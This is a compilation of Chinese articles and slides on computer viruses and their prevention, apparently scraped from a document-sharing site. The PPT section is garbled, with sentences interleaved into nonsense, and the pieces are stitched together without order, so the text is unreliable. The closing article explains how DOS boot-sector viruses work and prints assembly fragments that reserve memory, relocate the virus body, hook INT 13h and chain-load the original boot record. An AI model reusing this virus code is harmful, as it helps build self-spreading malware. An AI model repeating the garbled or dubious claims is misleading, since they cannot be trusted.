计算机病毒技术与计算机病毒防御
免疫计算机病的方法与技术
免疫计算机病的方法与技术在当今数字化的时代,计算机的使用范围已经越来越广泛。
但是,计算机病毒问题依然存在,这些病毒对计算机系统和信息安全造成了巨大的威胁。
特别是随着全球互联网的迅猛发展,计算机病毒的传播和蔓延速度也逐渐加快。
为了保护计算机系统和信息安全,科学家们研究了很多免疫计算机病的方法和技术。
本文将详细介绍免疫计算机病的方法和技术,以帮助读者更好地保护计算机系统和信息安全。
第一,防病毒软件技术防病毒软件技术是计算机病毒防范的标准方法。
一般来说,这种软件可以实时监控系统运行情况,及时发现和消除计算机病毒。
因此,及时更新和使用防病毒软件是免疫计算机病的一种基本方法。
第二,网络隔离技术网络隔离技术是通过物理或逻辑隔离来避免病毒传播的一种方法。
这种技术可以将计算机系统分割成若干个隔离区域,不同的隔离区域之间相互独立,从而防止病毒进行跨越性传播。
此外,网络隔离技术还可以提高信息安全级别,保护涉密信息的安全。
第三,人工智能技术近年来,人工智能技术在计算机安全领域也得到广泛应用。
为了提高计算机病毒检测和处理速度,科学家们使用人工智能技术进行研究。
这种技术可以大大加快病毒检测和处理的速度,并且可以在病毒攻击后快速恢复系统运行。
因此,人工智能技术也是防止计算机病毒侵害的有效方法之一。
第四,密码学技术密码学技术用于保护计算机系统和信息安全的一种方法。
密码学技术包括对称密钥加密、非对称密钥加密、哈希函数和数字签名等。
这些技术可以保证计算机系统在数据传输过程中的信息安全,并且可以防止黑客通过计算机病毒攻击系统。
第五,行为监控技术行为监控技术是计算机病毒防范的一种高级方法。
这种技术可以从行为层次上对计算机病毒进行检测和剔除。
行为监控技术可以监控系统各项活动,自动检测不符合规定的行为,及时判定并移除病毒。
综上所述,计算机病毒对计算机系统和信息安全造成了严重的威胁。
为了保护计算机系统和信息安全,科学家们研究了很多免疫计算机病的方法和技术。
计算机病毒与防护工作总结
计算机病毒与防护工作总结
随着计算机技术的飞速发展,计算机病毒也日益猖獗。
计算机病毒是一种可以
在计算机系统中复制并传播的恶意软件,它们可能会破坏文件、窃取个人信息,甚至使整个系统崩溃。
因此,保护计算机系统免受病毒侵害成为了一项重要的工作。
首先,了解计算机病毒的类型和传播方式是非常重要的。
常见的计算机病毒包
括蠕虫、木马、间谍软件等,它们可能通过电子邮件、下载文件、移动存储设备等方式传播。
因此,用户应该警惕来自未知来源的文件和链接,避免随意点击或下载可疑内容。
其次,安装有效的防病毒软件也是保护计算机系统的重要手段。
防病毒软件可
以实时监测系统的安全状态,及时发现并清除潜在的病毒威胁。
同时,定期更新防病毒软件的病毒库也是必不可少的,以保证软件能够及时识别最新的病毒变种。
此外,定期备份重要文件也是防范计算机病毒的重要措施。
在遭受病毒攻击时,备份文件可以帮助用户快速恢复受损的数据,减少损失。
而且,备份文件应该存储在离线设备上,以防止病毒通过网络传播到备份文件中。
最后,用户应该保持系统和应用程序的及时更新。
厂商会不断修复系统和应用
程序中的漏洞,以防止病毒利用这些漏洞进行攻击。
因此,用户应该定期检查系统和应用程序的更新,保证系统能够及时获取最新的安全补丁。
总的来说,计算机病毒的威胁无处不在,保护计算机系统免受病毒侵害需要全
面的工作。
用户应该加强对计算机病毒的了解,安装有效的防病毒软件,定期备份重要文件,并保持系统和应用程序的及时更新,以确保计算机系统的安全。
中学信息技术从技术的角度谈病毒防治
从技术的角度谈病毒防治病毒的防治技术总是在与病毒的较量中得到发展的。
总的来讲,计算机病毒的防治技术分成四个方面,即检测、清除、免疫和防御。
除了免疫技术因目前找不到通用的免疫方法而进展不大之外,其他三项技术都有相当的进展。
1.病毒预防技术计算机病毒的预防技术是指通过一定的技术手段防止计算机病毒对系统进行传染和破坏,实际上它是一种特征判定技术,也可能是一种行为规则的判定技术。
也就是说,计算机病毒的预防是根据病毒程序的特征对病毒进行分类处理,而后在程序运行中凡有类似的特征点出现则认定是计算机病毒。
具体来说,计算机病毒的预防是通过阻止计算机病毒进入系统内存或阻止计算机病毒对磁盘的操作尤其是写操作,以达到保护系统的目的。
计算机病毒的预防技术主要包括磁盘引导区保护、加密可执行程序、读写控制技术和系统监控技术等。
计算机病毒的预防应该包括两个部分:对已知病毒的预防和对未来病毒的预防。
目前,对已知病毒预防可以采用特征判定技术或静态判定技术,对未知病毒的预防则是一种行为规则的判定技术即动态判定技术。
2.病毒检测技术计算机病毒检测技术是指通过一定的技术手段判定出计算机病毒的一种技术。
病毒检测技术主要有两种,一种是根据计算机病毒程序中的关键字、特征程序段内容、病毒特征及传染方式、文件长度的变化,在特征分类的基础上建立的病毒检测技术;另一种是不针对具体病毒程序自身检验技术,即对某个文件或数据段进行检验和计算并保存其结果,以后定期或不定期地根据保存的结果对该文件或数据段进行检验,若出现差异,即表示该文件或数据段的完整性已遭到破坏,从而检测到病毒的存在。
计算机病毒的检测技术已从早期的人工观察发展到自动检测某一类病毒,今天又发展到能自动对多个驱动器、上千种病毒自动扫描检测。
目前,有些病毒检测软件还具有在不扩展由压缩软件生成的压缩文件内进行病毒检测的能力。
现在大多数商品化的病毒检测软件不仅能够检查隐藏在磁盘文件和引导扇区内的病毒,还能检测内存中驻留的计算机病毒。
计算机病毒防治
计算机病毒防治每个人都有防治计算机病毒的方法,那么要怎么样正确防治计算机病毒呢?方法一:首先你得有杀毒软件,这样才能清除掉可能感染的病毒杀软中一般都有防火墙,可防止你在日常操作中可能带来的操作风险,比如浏览挂马带病毒的网页或者链接;误打开伪装的病毒触发程序,一般附带于邮件和各种非正规站的盗版软件。
360安全卫士是一个辅助安全管理程序,360杀毒才是真正的杀毒软件,两个组合起来用效果还可以,基本能防止用户一般操作带来的风险,我自己的电脑是360安全卫士+360杀毒+Avast,这样比较费内存,不过要安全得多。
记住最重要的一点,安全的操作才是放计算机病毒的根本,我家一个长辈搞计算机20来年了,现在他自己的电脑里都没有杀毒软件,他说不需要。
方法二:措施有:1.建立有效的计算机病毒防护体系。
有效的计算机病毒防护体系应包括多个防护层。
1访问控制层;2病毒检测层;3病毒遏制层;4病毒清除层;5系统恢复层;6应急计划层。
上述六层计算机防护体系,须有有效的硬件和软件技术的支持,如安全设计及规范操作。
2.严把收硬件安全关。
国家的机密信息系统所用设备和系列产品,应建立自己的生产企业,实现计算机的国产化、系列化;对引进的计算机系统要在进行安全性检查后才能启用,以预防和限制计算机病毒伺机入侵。
3.防止电磁辐射和电磁泄露。
采取电磁屏蔽的方法,阻断电磁波辐射,这样,不仅可以达到防止计算机信息泄露的目的,而且可以防止“电磁辐射式”病毒的攻击。
4.加强计算机应急反应分队建设。
应成立自动化系统安全支援分队,以解决计算机防御性的有关问题。
早在1994年,美国软件工程学院就成立了计算机应急反应分队。
计算机病毒攻击与防御手段是不断发展的,要在计算机病毒对抗中保持领先地位,必须根据发展趋势,在关键技术环节上实施跟踪研究。
实施跟踪研究应着重围绕以下方面进行:1计算机病毒的数学模型。
2计算机病毒的注入方式,重点研究“固化”病毒的激发。
3计算机病毒的攻击方式,重点研究网络间无线传递数据的标准化,以及它的安全脆弱性和高频电磁脉冲病毒枪置人病毒的有效性。
计算机病毒与防治(共34张PPT)
• 杀掉不必要的进程
– 开始运行: ntsd –c q –p xxxx
• 其中xxxx为进程号(PID), • 可通过Ctrl+Alt+Del任务管理器进程 来查看PID
口令安全(密码)
– 口令
• 原则:自己易记、他人难猜、经常更改 • 技巧:不与自己直接相关,而是间接相关
编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。 病毒的编制者往往有特殊的破坏目的,因此不同的病毒攻击的对象也会不同
特别注意相似硬网址件,如防1cbc火, myq墙q等产品:锐捷、华为、中兴、思科、
你的计算机上正运行着什么程序?它们都是安全的吗?
目录•(右击不) 共要享 将权限密码设置为有顺序的数字或字母
无害型、无危险型、危险型、非常危险型
不原要理•使 :用包不本过人滤要的和生代将日理、服网身务证上件银号码行、银“行账登户中录的密前几码位、”后几和位或“姓交名的易拼音密作为码密码”。设置成相同的密码 D瑞O星S•注、册W在表ind修o任复ws工、何具Un情ihxt、tp况L:/i/un下x等 不能将密码透漏给他人,包括银行工作人员
隐藏性:
计算机病毒通常是隐蔽在其他合法的可执行程序和数据文件中的 一段程序,不易被人们察觉,对病毒的传染扩散十分有利。
计算机病毒的特点(续)
潜伏性:
在破坏之前属于潜伏状态,潜伏期越长,其传染范 围也会越大。
可触发性:
在一定的条件下(如特定的日期)才会发作,开始破 坏活动。
针对性:
病毒的编制者往往有特殊的破坏目的,因此不同的病 毒攻击的对象也会不同
计算机病毒防治措施
备份恢复
数据备份是保证数据安全的重要手段,可以通 过与备份文件的比较来判定是否有病毒入侵。当系 统文件被病毒侵染,可用备份文件恢复原有的系统。 数据备份可采用自动方式,也可采用手动方式;可 定期备份和也可按需备份。数据备份不仅可用于被 病毒侵入破坏的数据恢复,而且可在其它原因破坏 了数据完整性后进行系统恢复。
1.1 计算机病毒防治管理措施(续)
• 尽量避免在无防毒措施的机器上使用软盘、U盘、移 动硬盘、可擦写光盘等可移动的储存设备。
• 使用新软件时,先用杀毒程序检查。 • 安装杀毒软件、防火墙等防病毒工具,并准备一套具
有查毒、防毒、解毒及修复系统的工具软件。并定期 对软件进行升级、对系统进行查毒。 • 经常升级安全补丁。 • 使用复杂的密码。有许多网络病毒是通过猜测简单密 码的方式攻击系统的,因此使用复杂的密码,可大大 提高计算机的安全系数。
1.3 常用病毒防治软件简介
各种防病毒软件通常具有如下一些功能:按照用 户要求对系统进行定期查毒、杀毒;对系统进行文件 级、邮件级、内存级、网页级的实时监控;定期或智 能化的升级病毒库;硬盘数据的保护、备份和恢复; 注册表的维护和修复;多种压缩格式的查毒、杀毒; 多种安全策略的选择和用户自定义安全规则的设置。 有些还提供了硬盘恢复工具、系统漏洞扫描工具、系 统优化工具等。
• 了解一些病毒知识。这样就可以及时发现新病毒并 采取相应措施,在关键时刻使自己的计算机免受病 毒破坏。
1.1 计算机病毒防治管理措施(续)
• 一旦发现病毒,迅速隔离受感染的计算机,避免 病毒继续扩散。并使用可靠的查杀工具,必要时 需向国家计算机病毒应急中心和当地公共信息网 络安全监察部门报告,请专家协助处理。
软件过滤
软件过滤的目的是识别某一类特殊的病毒,以防止 它们进入系统和复制传播,已被用来保护一些大、中型 计算机系统。如国外使用的一种T-cell程序集,对系统 中的数据和程序用一种难以复制的印章加以保护,如果 印章被改变,系统就认为发生了非法入侵。又如Digital 公司的一些操作系统采用CA-examine程序作为病毒检 测工具主要用来分析关键的系统程序和内存常驻模块, 能检测出多种修改系统的病毒。
《计算机病毒技术及其防御》课程教学大纲
《计算机病毒技术及其防御》课程教学大纲一、课程基本信息二、课程简介《计算机病毒技术及其防御》(或《恶意代码原理与防范》)是网络空间安全专业中专业性与实践性较强的课程,是网络空间安全学科中的重要组成部分,与后续学习的多门课程皆有关联。
本课程主要研究恶意代码(计算机病毒)的分类、恶意代码的原理、恶意代码的行为、恶意代码静态与动态的分析方法以及恶意代码的防御技术,对构建学生网络安全类知识体系进而进行恶意代码攻防实践有重要作用。
课程的任务是通过课堂教学与实验教学方式,使学生能够从生命周期的角度掌握恶意代码技术的基本原理与实现方法,掌握常见恶意代码的防御方法,培养学生具备良好的恶意代码分析能力与常见恶意代码的防范能力,提高自身对相关领域的安全意识与职业素养,从而为今后从事网络信息安全领域相关工作奠定坚实的基础。
通过本课程学习,使学生能够通过对相关实操案例的分析,对恶意代码的种类、危害、应急、防御处理都有较为深入的认识,具备一定的分析研究能力,能够将本课程的相关知识与防御技术的思路和技巧用于解决恶意代码所带来的问题。
三、课程目标及其对毕业要求的支撑(一)课程目标课程目标1:理解恶意代码的基本概念和理论知识,能够描述恶意代码的基本特性以及恶意代码的发展趋势。
课程目标2:掌握恶意代码的基本技术,能够自觉运用基本知识认识恶意代码,并对常见的恶意代码的进行逆向分析,培养学生分析问题的能力。
课程目标3:掌握恶意代码防御技术,能够自觉运用所学知识进行恶意代码防御处理,并对其中常见问题进行分析并加以解决,培养学生研究和分析问题、工程部署与设计解决方案的能力。
(二)课程目标对毕业要求的支撑四、教学方法本课程课堂教学和上机实验并重,结合作业、练习及实验报告等教学手段和形式完成课程教学任务。
在课堂教学中,通过讲授、提问、实验、练习、演示等教学方法和手段让学生了解恶意代码,掌握恶意代码攻防的基本应用。
在实验、练习教学环节中,通过任务布置教学、培养学生动手能力,同时培养学生发现问题、分析问题和解决问题的能力。
《计算机病毒与防治》PPT课件
《计算机病毒与防治》PPT课件目录CONTENCT •计算机病毒概述•计算机病毒分类及原理•传播途径与感染方式•预防措施与策略部署•检测方法与技术手段•清除方法与工具介绍•总结回顾与未来展望01计算机病毒概述定义与特点定义计算机病毒是一种恶意软件,通过复制自身并在计算机网络中进行传播,从而破坏数据、干扰计算机操作,甚至危害网络安全。
特点具有隐蔽性、传染性、潜伏性、可触发性、破坏性等。
01020304早期病毒蠕虫病毒宏病毒恶意软件与勒索软件发展历程及现状利用宏语言编写的病毒,通过办公软件的宏功能进行传播。
90年代,随着互联网的发展,蠕虫病毒开始流行,通过网络漏洞进行传播。
20世纪80年代,计算机病毒开始出现,以恶作剧和炫耀技术为主。
近年来,恶意软件和勒索软件大量涌现,以窃取个人信息和勒索钱财为目的。
数据破坏系统崩溃网络传播经济损失危害程度与影响范围病毒可以删除、修改或加密用户数据,导致数据丢失或无法访问。
病毒会占用系统资源,导致系统性能下降、崩溃或无法启动。
病毒可以通过网络传播到其他计算机,造成大规模感染。
病毒会给个人和企业带来巨大的经济损失,包括数据恢复成本、系统修复成本和业务中断成本等。
02计算机病毒分类及原理010203寄生在可执行文件上,通过感染文件来传播。
修改文件内容,插入病毒代码,使文件执行时先执行病毒代码。
常见的文件型病毒有CIH、熊猫烧香等。
寄生在硬盘或软盘的引导区,通过感染引导区来传播。
修改引导区内容,插入病毒代码,使系统启动时先执行病毒代码。
常见的引导型病毒有大麻、小球等。
宏病毒寄生在Word、Excel等文档的宏中,通过文档传播。
脚本病毒寄生在网页脚本或邮件脚本中,通过网络传播。
利用宏或脚本语言的编程功能,实现病毒的自我复制和传播。
常见的宏病毒有TaiwanNo.1、Concept等,常见的脚本病毒有红色代码、爱虫等。
宏病毒和脚本病毒01020304网络蠕虫通过扫描网络漏洞,利用漏洞进行传播。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
计算机病毒技术与计算机病毒防御前言计算机病毒现在对所有的人来说已经不是很陌生了,有的朋友们可能倒霉的时候一天要遇到N中病毒和变种病毒,现在的计算机病毒发展也是越来越快了,技术也是越来越高,病毒的功能也在不断的强大起来了,从最早的病毒雏形只是为了实验和验证理论,到现在的病毒程序为了破坏、窃取以及其他更可怕的目的,计算机病毒给我们带来的威胁也是越来越可怕了。
以前如果有人说自己的计算机中病毒了,别人还回表示惊讶,但是现在呢?如果你去和别人说你的计算机中病毒,人家就会笑一笑的对你说“正常现象,恭喜你又中奖了。
”这说明计算机病毒已经无处不在了,任何人随时都可能中病毒了,而且中病毒好象已经成了家常便饭了,我朋友的计算机以前中病毒的时候还紧张的去买杀毒软件来杀毒,但现在再问他的时却说:“我是带毒工作,做到以毒攻毒”。
我还是强烈建议大家在中病毒之后一定要及时的处理,使用正版杀毒软件,病毒带来的灾难是不可估算的。
下面我们就看看与计算机病毒相关的技术。
正文不管你是要写病毒还是要做反病毒都应该对现有的计算机病毒技术有一个大概的了解,正所谓“知己知彼,百战不殆”。
大家都知道《计算机病毒防治管理办法》、《中华人民共和国计算机信息系统安全保护条例》,如果真的按这些法律法规来确定的话,那我在这里给大家做的讲解也是违法了,其实在反病毒技术圈里对这些法规都不是很满意,有一些条文是应该修改的,大家想一下一个没有病毒制造技术的人如何成为反病毒的专家呢?反病毒软件公司招的那些反病毒工程师难道就会一个汇编程序开发就可以了?难道去了公司再学习病毒原理?等学完了病毒原理和分析技术后,杀毒软件公司都快关门了。
所以关键是要看怎么把这些技术用到正道上来。
现在我们要言归正传了,现在的病毒与DOS和WIN3X下的病毒是大不一样了,从各个方面来讲都不一样。
在DOS时代我们还可以听说中了什么引导型病毒,计算机无法引导启动了,那你现在再看看,还有多少人说中引导型病毒呢?同时也没有新的引导型病毒诞生了,为什么会这样呢?听我慢慢道来。
现在我们使用的系统都可以说是WIN32系统了,如:win2000、win XP、win2003等,这些系统都属于保护模式下的系统,也就是说用户操作是要受到CPU保护监视的,用户执行的命令不能是系统级指令,如直接访问I/O,不能使用INT13来直接写硬盘等,DOS其实是工作实模式,也就是说整个DOS都是受用户控制的,用户可以直接进行I/O、INT访问,其次的原因是引导型病毒也很容易被发现,病毒体的生命周期短,任何杀毒软件现在都可以处理这类病毒的。
不管怎么样我还要说说引导型病毒的原理,他的具体实现的程序我没有写过,但我在这里提供一个简单说明。
一、病毒分类1)、引导型病毒:1、原理分析想要了解引导型病毒的原理,首先要了解引导区的结构。
软盘只有一个引导区,称为DOS BOOT SECTER ,只要软盘已格式化,就已存在。
其作用为查找盘上有无IO.SYS DOS.SYS,若有则引导,若无则显示…NO SYSTEM DISK...‟等信息。
硬盘有两个引导区,在0面0道1扇区的称为主引导区,内有主引导程序和分区表,主引导程序查找激活分区,该分区的第一个扇区即为DOS BOOT SECTER。
绝大多数病毒感染硬盘主引导扇区和软盘DOS引导扇区。
下面给出基本引导病毒的原理:带毒硬盘引导------>BIOS将硬盘主引导区读到内存0:7C00处控制权转到主引导程序(这是千古不变的)(病毒)-------->将0:413单元的值减少1K或nK------->计算可用内存高段地址将病毒移到高段继续执行-------->修改INT13地址,指向病毒传染段,将原INT13地址保存在某一单元------>病毒任务完成,将原引导区调入0:7C00执行------>机器正常引导带毒软盘引导----->判断硬盘是否有毒,若无毒则传染------>以下同上(传染时将病毒写入主引导扇区,将原引导程序存入某一扇区)以上是引导型病毒的基本框图,不论是最古老,还是最新的,万变不离其中。
只不过在各细节个人的技巧不同罢了。
驻留内存:一般采取修改0:413地址的方法,因为引导时,DOS还未加载这是唯一的方法,但有很大的缺点,启动后用MEM查看发现常规内存的总量少于640K,不够隐蔽,当然有办法解决,可以修改INT 8,检测INT 21是否建立,若建立则可采用DOS功能驻留内存。
隐形技术:当病毒驻留时,读写引导区均对原引导区操作,就好象没有病毒一样。
加密技术:一般加密分区表,使无毒盘启动,无法读取硬盘。
引导型病毒的优点:隐蔽性强,兼容性强,只要编的好,是不容易发现的,通用于DOS WINDOWS WIN95 操作系统。
缺点:很多,传染速毒慢,一定要带毒软盘启动才能传到硬盘,杀毒容易,只需改写引导区即可。
如: fdisk/mbr ,kv300,rav能查出所有引导型病毒,底板能对引导区写保护,所以现在纯引导型病毒已很少了。
以上是引导型病毒的基本框图,不论是最古老,还是最新的,万变不离其中.只不过在各细节个人的技巧不同罢了。
实现:引导形病毒指驻留在硬盘的主引导分区或硬软盘的DOS 引导分区的病毒。
由于pc 开机后,会先执行主引导分区的代码,因此病毒可以获得第一控制权,在引导DOS 操作系统之前,作完以下事情:a. 减少dos可用最大内存量,以供己需;如:xor ax,axmov ss,axmov sp,7c00hmov ds,axmov ax,word ptr ds:[413h] ; here store largest mem 0000:0413 sub ax,2 ; apply 2k mem for virusmov ds:[413h],axb. 修改必要的中断向量,以便传播;c. 读入病毒的其它部分,进行病毒的拼装(在内存高端);先从已标记的簇中某扇区读入病毒的其他部分,这些簇往往被标记为坏簇,(但是文件型病毒则不必如此,二者混合型亦然)然后再读入原引导记录到0000:7c00h,跳转执行。
代码如下:mov cl,06hshl ax,cl ; ax = 8F80add ax,0840h ; ax = 97c0mov es,axmov si,7c00h ; si = 7c00mov di,simov cx,0100hrepz movsw ; 将病毒移到高端.v2: push axpop dspush axmov bx,7c4bhpush bxret ; 指令执行转入高端内存call v3v3: xor ah,ah ; ah=0int 13hmov ah,80hand byte ptr ds:[7df8h],alv4: mov bx,word ptr ds:[7df9h] ; 读入病毒的其他部分.push cspop ax ; ax=97c0sub ax,20h ; ax=97a0mov es,ax ; es=97a0call v9mov bx,word ptr ds:[7df9h] ; load logic sector idinc bx ; bx++ , is boot sectormov ax,0ffc0h ; ffc0:8000 = 0000:7c00 读入原引导分区内容.mov es,axcall v9xor ax,ax ; AX=0mov byte ptr ds:[7df7h],al ; flag = 0v5: mov ds,ax ; ds=0mov ax,word ptr ds:[4ch] ;mov bx,word ptr ds:[4eh] ; 修改中断向量.mov word ptr ds:[4ch],7cd6hmov word ptr ds:[4eh],cs ; now int13h had been changedpush cspop ds ; ds=csmov word ptr ds:[7d30h],ax ; save original int13 vectormov word ptr ds:[7d32h],bx ;v6: mov dl,byte ptr ds:[7df8h] ; load drive letterv7:;========================================= ==============; jmp 0000:7c00 ; here is a jump;db 0eah,00h,7ch,00h,00h 这里是个跳转指令的二进制代码.;========================================= ==============d. 读入原主引导分区,转去执行dos的引导工作。
2)、文件型病毒:现在的病毒是什么呢?他们基本上是一些感染文件型病毒或者说是一些外壳型病毒,这些技术都是很CPU保护模式程序设计有关的技术。
DOS下的感染型病毒主要是感染16位的.com和.exe文件,因为DOS工作在实模式下,他是一个没有任何保护的系统,病毒程序可以通过修改MCB链轻松实现驻留和减少内存,可以修改系统的代码,拦截系统的中断。
但在win9X/NT/2000/XP/2003下就没有那么容易了,这些系统的页面是受到保护的,用户是不可以进行修改系统的代码页,那么按I/O许可位图中的规定,用户也是不可以直接进行端口访问的,也不能像DOS中通过INT21进行拦截所有文件的操作了,windows下的功能调用都通过API进行调用了。
从win9X 开始,系统中可执行文件的格式也有了很大的改变,windows3.X下的可执行程序的文件格式为NE,win9X以后的一般都是PE格式的,驱动程序有LE格式的,如win9X下的VXD驱动,可能有人要问LE是什么结构了,其实简单的来说就是一个线性可执行文件(Linear Executable)。
我们一般讲windows 下可执行文件的格式是PE(Portable Executbale)结构的,下面就大概讲一下PE文件。
PE文件使用的是一个平面地址空间,所有的数据是和代码是被合并在一起的,组成一个很大的结构,文件的内容被分割成不的section(区块),块中内容是包括有数据或代码,各个块是按页边界来对齐的,块没有大小限制,是一个连续的结构,每一个块都有自己在内存中一套属性,如某块在内存的代码是否可读、可写等。
每一个区块都有不同的名字,常见的有.text、.rdate、.date、.rsrc等,他们都有自己的用处。
PE文件在磁盘上的数据结构与在内存中的结构是一致的,装载一个可执行文件到内存中主要是将一个PE文件的某一个部分映射到地址空间中,这是有windows加载器遍历PE 文件并决定文件的哪部分被映射,这种映射是将文件较高的偏移位置映射到较高的内存地址中。